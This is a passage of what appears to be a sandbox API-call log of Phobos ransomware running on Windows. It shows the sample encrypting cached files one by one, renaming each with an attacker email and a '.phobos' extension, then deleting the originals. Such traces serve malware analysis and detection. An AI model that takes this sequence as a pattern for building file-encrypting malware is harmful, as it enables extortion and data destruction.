(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.884] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.884] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.885] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32828) returned 1 [0197.885] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.885] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x194, lpOverlapped=0x0) returned 1 [0197.886] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0) returned 1 [0197.886] WriteFile (in: hFile=0x118, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1a0, lpOverlapped=0x0) returned 1 [0197.887] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0197.887] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.887] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.887] CryptDestroyKey (hKey=0xa32868) returned 1 [0197.887] WriteFile (in: hFile=0x118, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.887] CryptDestroyKey (hKey=0xa32828) returned 1 [0197.887] CloseHandle (hObject=0x180) returned 1 [0197.887] CloseHandle (hObject=0x118) returned 1 [0197.887] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6")) returned 1 [0197.888] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.888] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=408) returned 1 [0197.888] CloseHandle (hObject=0x118) returned 1 [0197.888] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd")) returned 0x2024 [0197.889] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.889] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.889] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.892] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32828) returned 1 [0197.892] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.892] ReadFile (in: hFile=0x118, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x198, lpOverlapped=0x0) returned 1 [0197.893] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0, dwBufLen=0x1a0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a0) returned 1 [0197.893] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1a0, lpOverlapped=0x0) returned 1 [0197.894] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0197.894] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.894] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.894] CryptDestroyKey (hKey=0xa32868) returned 1 [0197.894] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.894] CryptDestroyKey (hKey=0xa32828) returned 1 [0197.894] CloseHandle (hObject=0x118) returned 1 [0197.894] CloseHandle (hObject=0x180) returned 1 [0197.894] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd")) returned 1 [0197.895] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.897] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=386) returned 1 [0197.897] CloseHandle (hObject=0x180) returned 1 [0197.898] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0")) returned 0x2024 [0197.898] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.898] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.898] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.899] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32828) returned 1 [0197.899] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.899] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x182, lpOverlapped=0x0) returned 1 [0197.899] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190, dwBufLen=0x190 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190) returned 1 [0197.899] WriteFile (in: hFile=0x118, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x190, lpOverlapped=0x0) returned 1 [0197.900] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0197.900] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.900] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.900] CryptDestroyKey (hKey=0xa32868) returned 1 [0197.900] WriteFile (in: hFile=0x118, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.900] CryptDestroyKey (hKey=0xa32828) returned 1 [0197.900] CloseHandle (hObject=0x180) returned 1 [0197.901] CloseHandle (hObject=0x118) returned 1 [0197.901] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0")) returned 1 [0197.901] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.902] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=390) returned 1 [0197.902] CloseHandle (hObject=0x118) returned 1 [0197.902] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e")) returned 0x2024 [0197.902] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0197.902] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.903] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.903] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32828) returned 1 [0197.903] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.903] ReadFile (in: hFile=0x118, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x186, lpOverlapped=0x0) returned 1 [0197.904] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190, dwBufLen=0x190 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x190) returned 1 [0197.904] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x190, lpOverlapped=0x0) returned 1 [0197.905] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0197.905] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0197.905] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0197.905] CryptDestroyKey (hKey=0xa32868) returned 1 [0197.905] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0197.905] CryptDestroyKey (hKey=0xa32828) returned 1 [0197.905] CloseHandle (hObject=0x118) returned 1 [0197.905] CloseHandle (hObject=0x180) returned 1 [0197.905] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e")) returned 1 [0197.906] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0197.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.907] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=390) returned 1 [0197.907] CloseHandle (hObject=0x180) returned 1 [0197.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1")) returned 0x2024 [0197.907] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0197.907] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.907] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0197.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 